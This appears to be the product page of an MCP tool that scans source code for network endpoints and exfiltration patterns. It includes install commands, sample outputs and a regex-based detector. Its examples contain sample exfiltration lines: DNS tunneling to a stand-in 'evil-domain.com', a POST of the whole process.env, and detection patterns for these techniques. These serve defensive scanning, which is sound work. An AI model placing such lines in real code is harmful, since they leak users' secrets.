Interactive Security Tool

Network Traffic Inspector

Scan source code for network activity patterns. Extract URLs, build domain maps, and detect suspicious exfiltration vectors before deployment.

Get the CLI Tool

Run the network inspector locally as an MCP server, or try it online below.

npx @clinetools/net-inspector
Requires Node.js 18+
  • URL and endpoint extraction from source code
  • Domain mapping with call frequency analysis
  • Exfiltration pattern detection (DNS tunneling, env leaks)
  • Risk scoring: CLEAN / LOW / MEDIUM / HIGH / CRITICAL
  • Zero config — just run with npx

How to Use It

Three ways to inspect network patterns in code — pick the one that fits your workflow.

1. Try Online

Use the interactive demo below to paste code and get an instant network analysis — no install needed.

2. Use via CLI

Run as a local MCP server and connect any MCP-compatible client.

npx @clinetools/net-inspector

3. Add to Cline / Claude Code

Add the tool to your MCP settings for instant access from your AI assistant.

"net-inspector": { "command": "npx", "args": ["@clinetools/net-inspector"] }

MCP Client Configuration

{
  "mcpServers": {
    "net-inspector": {
      "command": "npx",
      "args": ["@clinetools/net-inspector"]
    }
  }
}

Example: inspect_network — clean API client (low risk)

// Call the tool with source code:
inspect_network({ code: "const res = await fetch('http://localhost:3000/api/users');" })

// Output:
{
  "endpoints": [
    { "url": "http://localhost:3000/api/users", "method": "GET", "classification": "internal" }
  ],
  "domain_map": {
    "localhost:3000": { "calls": 1, "methods": ["GET"], "classification": "internal" }
  },
  "suspicious_patterns": [],
  "risk_level": "CLEAN",
  "summary": "1 endpoint found. All traffic is internal (localhost). No suspicious patterns."
}

Example: inspect_network — suspicious server (HIGH risk, exfiltration)

// Call with suspicious server code:
inspect_network({ code: "dns.resolve(`${chunk}.evil-domain.com`, 'TXT', () => {});" })

// Output:
{
  "endpoints": [
    { "url": "${chunk}.evil-domain.com", "method": "DNS", "classification": "external" },
    { "url": "process.env.EXFIL_ENDPOINT", "method": "POST", "classification": "dynamic" },
    { "url": "https://telemetry.suspicious-domain.io/beacon", "method": "POST", "classification": "external" }
  ],
  "domain_map": {
    "evil-domain.com": { "calls": 1, "methods": ["DNS"], "classification": "external" },
    "suspicious-domain.io": { "calls": 1, "methods": ["POST"], "classification": "external" },
    "[dynamic]": { "calls": 1, "methods": ["POST"], "classification": "dynamic" }
  },
  "suspicious_patterns": [
    { "severity": "critical", "pattern": "DNS Tunneling", "description": "DNS TXT query with encoded data in subdomain" },
    { "severity": "high", "pattern": "Environment Exfiltration", "description": "process.env piped into request body" },
    { "severity": "high", "pattern": "Base64 Encoding Near Network", "description": "Data encoded to base64 before transmission" }
  ],
  "risk_level": "HIGH",
  "summary": "3 endpoints, 2 external domains, 3 suspicious patterns. HIGH risk."
}

Live Demo

Try It Online

Paste source code to extract URLs, map domains, and detect suspicious network patterns.

Supports JavaScript, TypeScript, or any code with network calls

What the Inspector Analyzes

Static analysis of source code to map every network vector and flag suspicious patterns before deployment.

URL Extraction

Static analysis extracts URLs from string literals, template literals, and variable assignments. Even URLs built dynamically from env vars are flagged.

Domain Classification

Endpoints are classified as internal (localhost, 127.0.0.1), external (real domains), or dynamic (variable-based). External + dynamic destinations need the most scrutiny.

Exfiltration Detection

Flags classic exfiltration patterns: base64-encoding data before sending, using DNS TXT queries as covert channels, or flowing process.env into request bodies.
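
The following added example is not net-inspector's own code: it applies the Domain Classification rules and the three Exfiltration Detection patterns described above using regular expressions. The function names, the regexes, the 3-line proximity window and the sample input (reserved .example domains) are assumptions of this example.

```javascript
// Added illustration: a minimal regex scanner, NOT the net-inspector implementation.
// Function names, regexes and the 3-line window are assumptions of this example.
const INTERNAL_HOSTS = new Set(['localhost', '127.0.0.1']); // the page's "internal" set
const NET_CALL = /\b(?:fetch|axios(?:\.\w+)?|got|dns\.(?:resolve\w*|lookup)|net\.createConnection)\s*\(/;
const BASE64 = /\.toString\(\s*['"]base64['"]\s*\)|\bbtoa\s*\(/;

// internal / external / dynamic, judged on the static part of the host.
function classifyHost(target) {
  const host = target
    .replace(/^[a-z]+:\/\//i, '')  // drop scheme
    .split(/[\/?#]/)[0]            // keep authority only
    .replace(/\$\{[^}]*\}/g, '')   // drop interpolated pieces
    .replace(/:\d+$/, '')          // drop port
    .replace(/^\.+/, '')           // drop dots left behind by an interpolated label
    .toLowerCase();
  if (!host || host.startsWith('process.env')) return 'dynamic';
  return INTERNAL_HOSTS.has(host) ? 'internal' : 'external';
}

function inspectSource(code) {
  const endpoints = [];
  const suspicious = [];
  const add = (url) => endpoints.push({ url, classification: classifyHost(url) });
  // URLs in string or template literals
  for (const m of code.matchAll(/['"`]((?:https?|wss?):\/\/[^'"`\s]+)['"`]/g)) add(m[1]);
  // HTTP calls whose destination comes straight from an environment variable
  for (const m of code.matchAll(/\b(?:fetch|got|axios\.\w+)\(\s*(process\.env\.\w+)/g)) add(m[1]);
  // DNS queries whose hostname carries interpolated data
  for (const m of code.matchAll(/dns\.(?:resolve\w*|lookup)\(\s*`([^`]*\$\{[^`]*)`/g)) {
    add(m[1]);
    suspicious.push('DNS Tunneling');
  }
  // process.env flowing into a request body (same statement)
  if (/\bbody\s*:[^;]*process\.env\b/.test(code)) suspicious.push('Environment Exfiltration');
  // base64 encoding within 3 lines of a network call
  const lines = code.split('\n');
  const near = lines.some((line, i) => BASE64.test(line) &&
    lines.slice(Math.max(0, i - 3), i + 4).some((l) => NET_CALL.test(l)));
  if (near) suspicious.push('Base64 Encoding Near Network');
  return { endpoints, suspicious };
}
// Constructed sample input (reserved .example domain), not taken from a real package.
const SAMPLE = [
  "const res = await fetch('http://localhost:3000/api/users');",
  "const blob = Buffer.from(JSON.stringify(data)).toString('base64');",
  "await fetch(process.env.EXFIL_ENDPOINT, { method: 'POST', body: JSON.stringify(process.env) });",
  "dns.resolve(`${chunk}.tunnel.example`, 'TXT', () => {});",
].join('\n');
console.log(JSON.stringify(inspectSource(SAMPLE), null, 2));
```

Regex matching of this kind misses destinations assembled across several statements, so a result with no findings is a starting point for review rather than a verdict.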

Protocol Coverage

Scans HTTP (fetch, axios, got), WebSocket (ws, socket.io), DNS (dns.resolve, dns.lookup), and raw TCP (net.createConnection). All network vectors covered.

Context Analysis

A fetch to api.stripe.com is expected in a payment module. The same fetch in a logging module is suspicious. Context matters — but any external call deserves review.

Supply Chain Risks

MCP servers with broad network access can exfiltrate your code, credentials, and data. Inspect every outbound endpoint before granting network permissions.

Want Deep Network Analysis?

Submit your MCP server for a comprehensive network security audit.